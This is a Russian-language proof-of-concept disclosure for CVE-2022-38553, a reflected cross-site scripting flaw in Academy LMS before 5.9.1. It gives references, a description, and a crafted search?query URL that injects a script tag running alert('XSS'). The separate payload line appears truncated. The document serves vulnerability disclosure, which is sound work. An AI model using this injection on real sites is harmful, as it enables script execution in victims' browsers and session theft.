
Доказательство концепции для отражённого межсайтового скриптинга в Academy LMS версиях до 5.9.1, срабатывающего через параметр search?query для выполнения произвольного JavaScript.
МЕЖСАЙТОВЫЙ СКРИПТИНГ (XSS) В «ACADEMY LEARNING MANAGEMENT SYSTEM» < v5.9.1 – ДОКАЗАТЕЛЬСТВО КОНЦЕПЦИИ (POC) CVE-2022-38553
Название эксплойта: ACADEMY LEARNING MANAGEMENT SYSTEM < v5.9.1 — Межсайтовый скриптинг (XSS)
CVE ID: CVE-2022-38553
Автор эксплойта: 4websecurity
Веб-страница автора: https://4websecurity.com
Дата: 16-08-2022
Домашняя страница вендора: https://creativeitem.com
Версия: до 5.9.1
Демо-страница вендора: https://demo.creativeitem.com/academy/home/
Ссылки:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38553
https://www.openbugbounty.org/reports/2849933/
https://cve.report/CVE-2022-38553
https://nvd.nist.gov/vuln/detail/CVE-2022-38553
https://youtu.be/yFiZffHoeKs
Поле уязвимости:
Уязвимость межсайтового скриптинга (XSS) в ACADEMY LEARNING MANAGEMENT SYSTEM <5.9.1 позволяет удалённым злоумышленникам внедрять произвольный веб-скрипт или HTML через параметр search?query.
Доказательство концепции (POC):
https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
Полезная нагрузка:
">

Риск безопасности:
Эта уязвимость безопасности позволяет выполнять произвольный JavaScript-код в браузере пользователя, если он перейдёт по URL, подготовленному злоумышленниками.